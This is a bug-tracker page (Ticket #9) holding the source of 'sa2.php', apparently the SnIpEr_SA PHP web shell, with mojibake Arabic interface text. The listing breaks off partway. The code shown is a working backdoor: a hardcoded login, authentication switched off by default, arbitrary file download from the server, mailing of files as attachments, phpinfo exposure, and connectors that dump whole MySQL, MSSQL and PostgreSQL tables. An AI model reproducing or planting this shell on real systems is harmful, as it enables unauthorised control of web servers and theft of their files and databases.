Context Navigation

Back to Ticket #9

Ticket #9: sa2.php

File sa2.php, 213.5 KB (added by anonymous, 18 years ago)

Line
1	<?
2	#################################################################
3	# sniper_sa #
4	#################################################################
5	$tacfgd['uname'] = '911';
6	$tacfgd['pword'] = '911';
7	$tacfgd['title'] = 'SnIpEr_SA Shell';
8	$tacfgd['helptext'] = 'To proceed, please log in using the form below';
9	$tacfgd['allowrm'] = true;
10	$tacfgd['rmgroup'] = 'default';
11	$tacfgd['ownsessions'] = false;
12	foreach ($tacfgd as $key => $val) {
13	if (!isset($tacfg[$key])) $tacfg[$key] = $val;
14	}
15
16	if (!$tacfg['ownsessions']) {
17	session_name('txtauth');
18	session_start();
19	}
20
21	// Logout attempt made. Deletes any remember-me cookie as well
22	if (isset($_GET['logout']) \|\| isset($_POST['logout'])) {
23	setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
24	if (!$tacfg['ownsessions']) {
25	$_SESSION = array();
26	session_destroy();
27	}
28	else $_SESSION['txtauthin'] = false;
29	}
30	// Login attempt made
31	elseif (isset($_POST['login'])) {
32	if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
33	$_SESSION['txtauthin'] = true;
34	if ($_POST['rm']) {
35	// Set remember-me cookie for 2 weeks
36	setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
37	}
38	}
39	else $err = 'ÎØÇÁ Ýí ÇÓã ÇáãÓÊÎÏã Çæ ßáãå ÇáãÑæÑ';
40	}
41	// Remember-me cookie exists
42	elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
43	if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
44	$_SESSION['txtauthin'] = true;
45	}
46	else $err = 'ÓÌá ÏÎæá ãÑå ÇÎÑì';
47	}
48	if (!$_SESSION['txtauthin']) {
49	?>
50	<html>
51	<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
52	<head>
53	<title><?=$tacfg['title']?></title>
54	<STYLE>
55
56	BODY
57	{
58	SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
59	}
60
61	td {
62	BORDER-RIGHT: #000000 1 solid;
63	BORDER-TOP: #000000 1 solid;
64	BORDER-LEFT: #000000 1 solid;
65	BORDER-BOTTOM: #000000 1 solid;
66	color: #cccccc;
67	}
68	.grey {
69	BORDER: 1;
70	BACKGROUND-COLOR: #000000;
71	color: #333333;
72	}
73	input {
74	BORDER-RIGHT: #990000 1 solid;
75	BORDER-TOP: #990000 1 solid;
76	BORDER-LEFT: #990000 1 solid;
77	BORDER-BOTTOM: #990000 1 solid;
78	BACKGROUND-COLOR: #333333;
79	font: 9pt tahoma;
80	color: #ffffff;
81	}
82	.txtbox {
83	BORDER-RIGHT: #990000 1 solid;
84	BORDER-TOP: #990000 1 solid;
85	BORDER-LEFT: #990000 1 solid;
86	BORDER-BOTTOM: #990000 1 solid;
87	BACKGROUND-COLOR: #333333;
88	font: Fixedsys bold;
89	color: #990000;
90	}
91	BODY {
92	color: #cccccc;
93	background-color: #000000;
94	}
95
96	</STYLE>
97	</head>
98
99	<body>
100	<div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div>
101	<hr width="300" size="1" noshade color="#cdcdcd">
102	<p>
103	</div>
104	<p>
105	<?
106	if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
107	else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
108	if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
109	?>
110	<form name="txtauth" action="<?=$action?>" method="post">
111	<table border="0" cellpadding="4" cellspacing="0" bgcolor="#333333" align="center" style="border: #dedede 1px double;">
112	<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
113	<?if (isset($tacfg['uname'])) {?>
114	<tr><td>ÃÓã ÇáãÓÊÎÏã:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
115	<?}?>
116	<tr><td>ßáãå ÇáÓÑ:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
117	<?if ($tacfg['allowrm']) {?>
118	<tr><td align="left"><input type="submit" name="login" value=" ÏÎæá">
119	</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm">ÇáÏÎæá ÇáÊáÞÇÆí</label></td></tr>
120	<?} else {?>
121	<tr><td colspan="2" align="center"><input type="submit" name="login" value=" ÏÎæá "></td></tr>
122	<?}?>
123	<tr><td>ÃÓã ÇáãæÞÚ:</td><td><? echo ws(3)."<b> ".$_SERVER["HTTP_HOST"]."</b><br/>";
124	echo "</b></font>";
125
126	?></td></tr>
127	<tr><td>Ãí Èí ÇáÓíÑÝÑ:</td><td><? echo ws(3)."<b> ".gethostbyname($_SERVER["HTTP_HOST"])."</b><br/>";
128	echo "</b></font>";
129
130	?></td></tr>
131	<tr><td>Ãí Èí ÌåÇÒß:</td><td><? echo ws(3)."<b> ".$_SERVER["REMOTE_ADDR"]."</b><br/>";
132	echo "</b></font>";
133
134	?></td></tr>
135
136	</table>
137	</form>
138
139	<br><br><br>
140	<hr width="300" size="1" noshade color="#cdcdcd"><div class="smalltxt" align="center">powered by <a href="http://sniper-sa.com">SnIpEr_SA</a> · copyright © 2007, SnIpEr_SA</div>
141
142	</body>
143	</html>
144	<?
145	// Don't delete this!
146	exit();
147	}
148	?>
149	ÃÓã ÇáãÓÊÎÏã: (<font color="#FF0000"><? echo $tacfgd['uname']; ?></font>) <a href="?logout=1">ÊÓÌíá ÇáÎÑæÌ</a></p>
150	<div align="right">
151	<?php
152	/******************************************************************************************************/
153	/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
154	/* (c)oded by SnIpEr_SA
155	/* MAIL http://sniper-sa.com , http://sniper-sa.com
156	/******************************************************************************************************/
157	/* ~~~ ÇáÎíÇÑÇÊ \| Options ~~~ */
158	// ÇááÛÉ \| Language
159	// $language='eng' - english (english)
160	// $language='ar' - arabi (arabi)
161	$language='ar';
162	// ?????????????? \| Authentification
163	// $auth = 1; - áÊÝÚíá ÇáÏÎæá Èßáãå ÇáãÑæÑ ( authentification = On )
164	// $auth = 0; - áÇíÞÇÝ ÇáÏÎæá ÈßáãÉ ÇáãÑæÑ ( authentification = Off )
165	$auth = 0;
166	// áÏÎæá ÈßáãÉ ãÑæÑ æÇÓã ãÓÊÎÏã (Login & Password for access)
167	// áÍãÇíÉ ÇáÓßÑÈÊ ãä ÏÎæá ÛíÑß ÛíÑ ÇáÊÇáí!!! (CHANGE THIS!!!)
168	// åäÇ æÖÚß ßáãå ÇáãÑæÑ æåí ãÔÝÑå ÈÕíÛå md5, æßáãÉÚ ÇáãÑæÑ åäÇ åí 'sniper'
169	// ÊÓÊÚØíÚ Çä ÊÔÝÑ ßáãÉ ãÑæÑß æÇÓã ÇáãÓÊÎÏã ÈÕíÛÉ md5 ææÖÚåÇ Ýí ÇáÎÇäÇÊ ÇáÊÇáíå
170	$name='1c27680133b781cadd037e8a6dcc001b'; // ÇÓã ÇáãÓÊÎÏã (user login)
171	$pass='1c27680133b781cadd037e8a6dcc001b'; // ßáãÉ ÇáãÑæÑ (user password)
172	/******************************************************************************************************/
173
174	echo "".htmlspecialchars($copy)."";
175	error_reporting(0);
176	set_magic_quotes_runtime(0);
177	@set_time_limit(0);
178	@ini_set('max_execution_time',0);
179	@ini_set('output_buffering',0);
180	$safe_mode = @ini_get('safe_mode');
181	$version = '1.31';
182	if(version_compare(phpversion(), '4.1.0') == -1)
183	{
184	$_POST = &$HTTP_POST_VARS;
185	$_GET = &$HTTP_GET_VARS;
186	$_SERVER = &$HTTP_SERVER_VARS;
187	$_COOKIE = &$HTTP_COOKIE_VARS;
188	}
189	if (@get_magic_quotes_gpc())
190	{
191	foreach ($_POST as $k=>$v)
192	{
193	$_POST[$k] = stripslashes($v);
194	}
195	foreach ($_COOKIE as $k=>$v)
196	{
197	$_COOKIE[$k] = stripslashes($v);
198	}
199	}
200
201	if($auth == 1) {
202	if (!isset($_SERVER['PHP_AUTH_USER']) \|\| md5($_SERVER['PHP_AUTH_USER'])!==$name \|\| md5($_SERVER['PHP_AUTH_PW'])!==$pass)
203	{
204	header('WWW-Authenticate: Basic realm="SnIpEr_SA shell"');
205	header('HTTP/1.0 401 Unauthorized');
206	exit("<b><a href=http://sniper-sa.com>SnIpEr_SA</a> : Access Denied</b>");
207	}
208	}
209	$head = '<!-- SnIpEr_SA -->
210	<html>
211	<head>
212	<meta http-equiv="Content-Language" content="ar-sa">
213	<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
214	<meta name="ProgId" content="FrontPage.Editor.Document">
215	<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
216	<title>SnIpEr_SA shell</title>
217
218
219
220	<STYLE>
221
222	BODY
223	{
224	SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
225	}
226
227	tr {
228	BORDER-RIGHT: #cccccc ;
229	BORDER-TOP: #cccccc ;
230	BORDER-LEFT: #cccccc ;
231	BORDER-BOTTOM: #cccccc ;
232	color: #ffffff;
233	}
234	td {
235	BORDER-RIGHT: #cccccc ;
236	BORDER-TOP: #cccccc ;
237	BORDER-LEFT: #cccccc ;
238	BORDER-BOTTOM: #cccccc ;
239	color: #cccccc;
240	}
241	.table1 {
242	BORDER: 1;
243	BACKGROUND-COLOR: #000000;
244	color: #333333;
245	}
246	.td1 {
247	BORDER: 1;
248	font: 7pt tahoma;
249	color: #ffffff;
250	}
251	.tr1 {
252	BORDER: 1;
253	color: #cccccc;
254	}
255	table {
256	BORDER: #eeeeee outset;
257	BACKGROUND-COLOR: #000000;
258	color: #cccccc;
259	}
260	input {
261	BORDER-RIGHT: #990000 1 solid;
262	BORDER-TOP: #990000 1 solid;
263	BORDER-LEFT: #990000 1 solid;
264	BORDER-BOTTOM: #990000 1 solid;
265	BACKGROUND-COLOR: #333333;
266	font: 9pt tahoma;
267	color: #ffffff;
268	}
269	select {
270	BORDER-RIGHT: #ffffff 1 solid;
271	BORDER-TOP: #999999 1 solid;
272	BORDER-LEFT: #999999 1 solid;
273	BORDER-BOTTOM: #ffffff 1 solid;
274	BACKGROUND-COLOR: #000000;
275	font: 9pt tahoma;
276	color: #CCCCCC;;
277	}
278	submit {
279	BORDER: buttonhighlight 1 outset;
280	BACKGROUND-COLOR: #272727;
281	width: 40%;
282	color: #cccccc;
283	}
284	textarea {
285	BORDER-RIGHT: #ffffff 1 solid;
286	BORDER-TOP: #999999 1 solid;
287	BORDER-LEFT: #999999 1 solid;
288	BORDER-BOTTOM: #ffffff 1 solid;
289	BACKGROUND-COLOR: #333333;
290	font: Fixedsys bold;
291	color: #ffffff;
292	}
293	BODY {
294	margin: 1;
295	color: #cccccc;
296	background-color: #000000;
297	}
298	A:link {COLOR:red; TEXT-DECORATION: none}
299	A:visited { COLOR:red; TEXT-DECORATION: none}
300	A:active {COLOR:red; TEXT-DECORATION: none}
301	A:hover {color:blue;TEXT-DECORATION: none}
302
303	</STYLE>
304	<script language=\'javascript\'>
305	function hide_div(id)
306	{
307	document.getElementById(id).style.display = \'none\';
308	document.cookie=id+\'=0;\';
309	}
310	function show_div(id)
311	{
312	document.getElementById(id).style.display = \'block\';
313	document.cookie=id+\'=1;\';
314	}
315	function change_divst(id)
316	{
317	if (document.getElementById(id).style.display == \'none\')
318	show_div(id);
319	else
320	hide_div(id);
321	}
322	</script>';
323	class zipfile
324	{
325	var $datasec = array();
326	var $ctrl_dir = array();
327	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
328	var $old_offset = 0;
329	function unix2DosTime($unixtime = 0) {
330	$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
331	if ($timearray['year'] < 1980) {
332	$timearray['year'] = 1980;
333	$timearray['mon'] = 1;
334	$timearray['mday'] = 1;
335	$timearray['hours'] = 0;
336	$timearray['minutes'] = 0;
337	$timearray['seconds'] = 0;
338	}
339	return (($timearray['year'] - 1980) << 25) \| ($timearray['mon'] << 21) \| ($timearray['mday'] << 16) \|
340	($timearray['hours'] << 11) \| ($timearray['minutes'] << 5) \| ($timearray['seconds'] >> 1);
341	}
342	function addFile($data, $name, $time = 0)
343	{
344	$name = str_replace('\\', '/', $name);
345	$dtime = dechex($this->unix2DosTime($time));
346	$hexdtime = '\x' . $dtime[6] . $dtime[7]
347	. '\x' . $dtime[4] . $dtime[5]
348	. '\x' . $dtime[2] . $dtime[3]
349	. '\x' . $dtime[0] . $dtime[1];
350	eval('$hexdtime = "' . $hexdtime . '";');
351	$fr = "\x50\x4b\x03\x04";
352	$fr .= "\x14\x00";
353	$fr .= "\x00\x00";
354	$fr .= "\x08\x00";
355	$fr .= $hexdtime;
356	$unc_len = strlen($data);
357	$crc = crc32($data);
358	$zdata = gzcompress($data);
359	$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
360	$c_len = strlen($zdata);
361	$fr .= pack('V', $crc);
362	$fr .= pack('V', $c_len);
363	$fr .= pack('V', $unc_len);
364	$fr .= pack('v', strlen($name));
365	$fr .= pack('v', 0);
366	$fr .= $name;
367	$fr .= $zdata;
368	$this -> datasec[] = $fr;
369	$cdrec = "\x50\x4b\x01\x02";
370	$cdrec .= "\x00\x00";
371	$cdrec .= "\x14\x00";
372	$cdrec .= "\x00\x00";
373	$cdrec .= "\x08\x00";
374	$cdrec .= $hexdtime;
375	$cdrec .= pack('V', $crc);
376	$cdrec .= pack('V', $c_len);
377	$cdrec .= pack('V', $unc_len);
378	$cdrec .= pack('v', strlen($name) );
379	$cdrec .= pack('v', 0 );
380	$cdrec .= pack('v', 0 );
381	$cdrec .= pack('v', 0 );
382	$cdrec .= pack('v', 0 );
383	$cdrec .= pack('V', 32 );
384	$cdrec .= pack('V', $this -> old_offset );
385	$this -> old_offset += strlen($fr);
386	$cdrec .= $name;
387	$this -> ctrl_dir[] = $cdrec;
388	}
389	function file()
390	{
391	$data = implode('', $this -> datasec);
392	$ctrldir = implode('', $this -> ctrl_dir);
393	return
394	$data .
395	$ctrldir .
396	$this -> eof_ctrl_dir .
397	pack('v', sizeof($this -> ctrl_dir)) .
398	pack('v', sizeof($this -> ctrl_dir)) .
399	pack('V', strlen($ctrldir)) .
400	pack('V', strlen($data)) .
401	"\x00\x00";
402	}
403	}
404	function compress(&$filename,&$filedump,$compress)
405	{
406	global $content_encoding;
407	global $mime_type;
408	if ($compress == 'bzip' && @function_exists('bzcompress'))
409	{
410	$filename .= '.bz2';
411	$mime_type = 'application/x-bzip2';
412	$filedump = bzcompress($filedump);
413	}
414	else if ($compress == 'gzip' && @function_exists('gzencode'))
415	{
416	$filename .= '.gz';
417	$content_encoding = 'x-gzip';
418	$mime_type = 'application/x-gzip';
419	$filedump = gzencode($filedump);
420	}
421	else if ($compress == 'zip' && @function_exists('gzcompress'))
422	{
423	$filename .= '.zip';
424	$mime_type = 'application/zip';
425	$zipfile = new zipfile();
426	$zipfile -> addFile($filedump, substr($filename, 0, -4));
427	$filedump = $zipfile -> file();
428	}
429	else
430	{
431	$mime_type = 'application/octet-stream';
432	}
433	}
434	function mailattach($to,$from,$subj,$attach)
435	{
436	$headers = "From: $from\r\n";
437	$headers .= "MIME-Version: 1.0\r\n";
438	$headers .= "Content-Type: ".$attach['type'];
439	$headers .= "; name=\"".$attach['name']."\"\r\n";
440	$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
441	$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
442	if(@mail($to,$subj,"",$headers)) { return 1; }
443	return 0;
444	}
445	class my_sql
446	{
447	var $host = 'localhost';
448	var $port = '';
449	var $user = '';
450	var $pass = '';
451	var $base = '';
452	var $db = '';
453	var $connection;
454	var $res;
455	var $error;
456	var $rows;
457	var $columns;
458	var $num_rows;
459	var $num_fields;
460	var $dump;
461
462	function connect()
463	{
464	switch($this->db)
465	{
466	case 'MySQL':
467	if(empty($this->port)) { $this->port = '3306'; }
468	if(!function_exists('mysql_connect')) return 0;
469	$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
470	if(is_resource($this->connection)) return 1;
471	break;
472	case 'MSSQL':
473	if(empty($this->port)) { $this->port = '1433'; }
474	if(!function_exists('mssql_connect')) return 0;
475	$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
476	if($this->connection) return 1;
477	break;
478	case 'PostgreSQL':
479	if(empty($this->port)) { $this->port = '5432'; }
480	$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
481	if(!function_exists('pg_connect')) return 0;
482	$this->connection = @pg_connect($str);
483	if(is_resource($this->connection)) return 1;
484	break;
485	case 'Oracle':
486	if(!function_exists('ocilogon')) return 0;
487	$this->connection = @ocilogon($this->user, $this->pass, $this->base);
488	if(is_resource($this->connection)) return 1;
489	break;
490	}
491	return 0;
492	}
493
494	function select_db()
495	{
496	switch($this->db)
497	{
498	case 'MySQL':
499	if(@mysql_select_db($this->base,$this->connection)) return 1;
500	break;
501	case 'MSSQL':
502	if(@mssql_select_db($this->base,$this->connection)) return 1;
503	break;
504	case 'PostgreSQL':
505	return 1;
506	break;
507	case 'Oracle':
508	return 1;
509	break;
510	}
511	return 0;
512	}
513
514	function query($query)
515	{
516	$this->res=$this->error='';
517	switch($this->db)
518	{
519	case 'MySQL':
520	if(false===($this->res=@mysql_query('/'.chr(0).'/'.$query,$this->connection)))
521	{
522	$this->error = @mysql_error($this->connection);
523	return 0;
524	}
525	else if(is_resource($this->res)) { return 1; }
526	return 2;
527	break;
528	case 'MSSQL':
529	if(false===($this->res=@mssql_query($query,$this->connection)))
530	{
531	$this->error = 'Query error';
532	return 0;
533	}
534	else if(@mssql_num_rows($this->res) > 0) { return 1; }
535	return 2;
536	break;
537	case 'PostgreSQL':
538	if(false===($this->res=@pg_query($this->connection,$query)))
539	{
540	$this->error = @pg_last_error($this->connection);
541	return 0;
542	}
543	else if(@pg_num_rows($this->res) > 0) { return 1; }
544	return 2;
545	break;
546	case 'Oracle':
547	if(false===($this->res=@ociparse($this->connection,$query)))
548	{
549	$this->error = 'Query parse error';
550	}
551	else
552	{
553	if(@ociexecute($this->res))
554	{
555	if(@ocirowcount($this->res) != 0) return 2;
556	return 1;
557	}
558	$error = @ocierror();
559	$this->error=$error['message'];
560	}
561	break;
562	}
563	return 0;
564	}
565	function get_result()
566	{
567	$this->rows=array();
568	$this->columns=array();
569	$this->num_rows=$this->num_fields=0;
570	switch($this->db)
571	{
572	case 'MySQL':
573	$this->num_rows=@mysql_num_rows($this->res);
574	$this->num_fields=@mysql_num_fields($this->res);
575	while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
576	@mysql_free_result($this->res);
577	if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
578	break;
579	case 'MSSQL':
580	$this->num_rows=@mssql_num_rows($this->res);
581	$this->num_fields=@mssql_num_fields($this->res);
582	while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
583	@mssql_free_result($this->res);
584	if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
585	break;
586	case 'PostgreSQL':
587	$this->num_rows=@pg_num_rows($this->res);
588	$this->num_fields=@pg_num_fields($this->res);
589	while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
590	@pg_free_result($this->res);
591	if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
592	break;
593	case 'Oracle':
594	$this->num_fields=@ocinumcols($this->res);
595	while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
596	@ocifreestatement($this->res);
597	if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
598	break;
599	}
600	return 0;
601	}
602	function dump($table)
603	{
604	if(empty($table)) return 0;
605	$this->dump=array();
606	$this->dump[0] = '##';
607	$this->dump[1] = '## --------------------------------------- ';
608	$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
609	$this->dump[3] = '## Database: '.$this->base;
610	$this->dump[4] = '## Table: '.$table;
611	$this->dump[5] = '## --------------------------------------- ';
612	switch($this->db)
613	{
614	case 'MySQL':
615	$this->dump[0] = '## MySQL dump';
616	if($this->query('/'.chr(0).'/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
617	if(!$this->get_result()) return 0;
618	$this->dump[] = $this->rows[0]['Create Table'];
619	$this->dump[] = '## --------------------------------------- ';
620	if($this->query('/'.chr(0).'/ SELECT * FROM `'.$table.'`')!=1) return 0;
621	if(!$this->get_result()) return 0;
622	for($i=0;$i<$this->num_rows;$i++)
623	{
624	foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
625	$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
626	}
627	break;
628	case 'MSSQL':
629	$this->dump[0] = '## MSSQL dump';
630	if($this->query('SELECT * FROM '.$table)!=1) return 0;
631	if(!$this->get_result()) return 0;
632	for($i=0;$i<$this->num_rows;$i++)
633	{
634	foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
635	$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
636	}
637	break;
638	case 'PostgreSQL':
639	$this->dump[0] = '## PostgreSQL dump';
640	if($this->query('SELECT * FROM '.$table)!=1) return 0;
641	if(!$this->get_result()) return 0;
642	for($i=0;$i<$this->num_rows;$i++)
643	{
644	foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
645	$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
646	}
647	break;
648	case 'Oracle':
649	$this->dump[0] = '## ORACLE dump';
650	$this->dump[] = '## under construction';
651	break;
652	default:
653	return 0;
654	break;
655	}
656	return 1;
657	}
658	function close()
659	{
660	switch($this->db)
661	{
662	case 'MySQL':
663	@mysql_close($this->connection);
664	break;
665	case 'MSSQL':
666	@mssql_close($this->connection);
667	break;
668	case 'PostgreSQL':
669	@pg_close($this->connection);
670	break;
671	case 'Oracle':
672	@oci_close($this->connection);
673	break;
674	}
675	}
676	function affected_rows()
677	{
678	switch($this->db)
679	{
680	case 'MySQL':
681	return @mysql_affected_rows($this->res);
682	break;
683	case 'MSSQL':
684	return @mssql_affected_rows($this->res);
685	break;
686	case 'PostgreSQL':
687	return @pg_affected_rows($this->res);
688	break;
689	case 'Oracle':
690	return @ocirowcount($this->res);
691	break;
692	default:
693	return 0;
694	break;
695	}
696	}
697	}
698	if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
699	{
700	if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
701	else
702	{
703	@ob_clean();
704	$filename = @basename($_POST['d_name']);
705	$filedump = @fread($file,@filesize($_POST['d_name']));
706	fclose($file);
707	$content_encoding=$mime_type='';
708	compress($filename,$filedump,$_POST['compress']);
709	if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
710	header("Content-type: ".$mime_type);
711	header("Content-disposition: attachment; filename=\"".$filename."\";");
712	echo $filedump;
713	exit();
714	}
715	}
716
717	if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
718	if(isset($_GET['sqlman'])) {
719	session_start();
720	$action = $HTTP_GET_VARS['action'];
721	$pagemax=20; // Maximum rows displaed per page, change to display more or less rows per page.
722	function show_login($dbnamearray){
723	$hostdefault="localhost";
724	echo"<table>";
725	echo"<form name='showlogin' method='post' action='$action'>";
726	if(count($hostdefault) > 1){
727	echo"<tr><td>??? C???????:</td><td><select name=host>";
728	for($x=0; $x < count($hostdefault);$x++){
729	echo"<option value=$hostdefault[$x]>$hostdefault[$x]";
730	}
731	echo"</select></td></tr>\n";
732	}else{
733	echo"<tr><td>ÓíÑÝÑ ÞæÇÚÏ ÇáÈíÇäÇÊ:</td><td><input type=text name='host' size=15 value=$hostdefault /></td></tr>\n";
734	}
735	echo"<tr><td>ÇÓã ÇáãÓÊÎÏã:</td><td><input type=text name='userid' size=15 /></td></tr>\n";
736	echo"<tr><td>ßáãå ÇáãÑæÑ:</td><td><input type=password name='pword1' size=15 /></td></tr>\n";
737
738	If($dbnamearray != ""){
739	echo"<tr><td>?C?IE C?E?C?CE:</td><td><select name='dbna'>\n";
740	for ($i =0; $i < count($dbnamearray); $i++) {
741	$dbn=$dbnamearray[$i];
742	echo"<option value=$dbn>$dbn";
743	}
744	}
745	echo"<tr><td><input class=ser type='submit' name='login' value='ÏÎæá' /></td>\n";
746	echo"<td><input class=ser type=reset name='reset' value='ãÓÍ' /></td></tr>\n";
747	echo"</form></table>\n";
748
749	}
750
751	function dbrestrict(){
752	if(isset($_SESSION['user'])){
753	$user=$_SESSION['user'];
754
755	switch($user){
756
757	//Edit these ** values. You can add more case statements.
758	case 'User':
759	$dbnamearray= array('dbname', 'dbname2', 'dbname');
760	break;
761	//end edit values
762
763	default:
764	$_SESSION['defaltuser']=true;
765	$dbnamearray = array();
766	$link = connectmysql();
767
768	$db_list = mysql_list_dbs($link); //$db_list
769	$cnt = mysql_num_rows($db_list);
770	for ($i =0; $i < $cnt; $i++) {
771	$dbnamearray[$i]= mysql_db_name($db_list, $i);
772	}
773	}
774	return $dbnamearray;
775	}
776	}
777	//***************************************************************
778	//function showdbs($dbnamearray, $backuppath){
779	function showdbs($dbnamearray){
780	//$backuppath=addslashes($backuppath);
781	echo"<table>\n";
782	for ($i =0; $i < count($dbnamearray); $i++) {
783	echo"<tr><td>";
784	$dbn=$dbnamearray[$i];
785	$va="ÇáÐåÇÈ Çáì ÞÇÚÏÉ $dbn";
786	goto(' ', $dbn,$action, 'but', 'db', $va );
787
788	$dbs=mysize($dbnamearray[$i],"");
789	echo"</td><td>$dbs</td></tr>\n";
790	}
791	echo"</table>\n";
792	}
793
794
795	//******************* Show Logout Button ********
796	function endsess(){
797	echo"<form method='post' name='endsess' action='$action'>\n";
798	echo"<input class=ser type='submit' name='logout' value='ÎÑæÌ' />\n";
799	echo"</form>";
800	}
801
802	//********************************************************************
803	function connectmysql(){
804	//Connects to the MySQL Database.
805
806
807	if (isset($_SESSION['user']) && isset($_SESSION['password'])){
808	$user = $_SESSION['user'];
809	$pass = $_SESSION['password'];
810	}else{
811	display_foot();
812	echo"\n</body>\n</html>";
813	exit();
814	}
815	$link = @mysql_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['password']);
816	if(! $link){
817	echo"<div class='error'>\n";
818	echo"Unable to connect to the database server. <BR>";
819	echo"The Host: $_SESSION[host], ÇÓã ÇáãÓÊÎÏã: $user Çæ Çáßáãå ÇáÓÑíå ÎØÇÁ. <br>";
820	echo"ÝÖáÇð ÓÌá ÎÑæÌ ááãÍÇæáå ãÑå ÇÎÑì.\n";
821	echo"</div>\n";
822
823	return false;
824	exit();
825	} else{
826	return $link;
827	}
828
829	}
830	//*********************************************************************
831	function connectdb($db, $link){
832	if(! mysql_select_db($db,$link)){
833	echo"Unable to locate database $db.<br> Please try again later.\n";
834	exit();
835	}
836	}
837	//*********************************************************************
838	function exequery($sql, $tablename, $db){
839	$result= @mysql_query( $sql );
840	if($result){
841	//echo "Query successful";
842	return $result;
843	}else{
844	echo"Sorry your Query failed: $sql <br> error:".mysql_error()."\n";
845	return false;
846	}
847	}
848
849
850	//***************************************************
851	$fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT",
852	"INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION",
853	"REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" );
854
855
856	//**************** Search Form **************************
857	function searchtableform($tablename, $dbname){
858	echo"<form method='post' action='$action'>\n";
859	echo"<input type=hidden name='dbname' value='$dbname' />\n";
860	echo"<input type=hidden name='tablename' value='$tablename' />\n";
861	echo"<input type=text name='searchval' />\n";
862	echo"<input class=ser type=submit name='search' value='Search $tablename' />\n";
863	echo"</form>\n";
864	}
865	//******************* Search ***********************
866	function searcht($tablename, $dbname, $searchval){
867	if(! empty($searchval)){
868	// $searchval= str_replace(";",' ', $searchval);
869	$result=exequery("Select * from $tablename", $tablename, $dbname);
870	//$result=mysql_query("Select * from $tablename");
871	$num = mysql_num_fields($result);
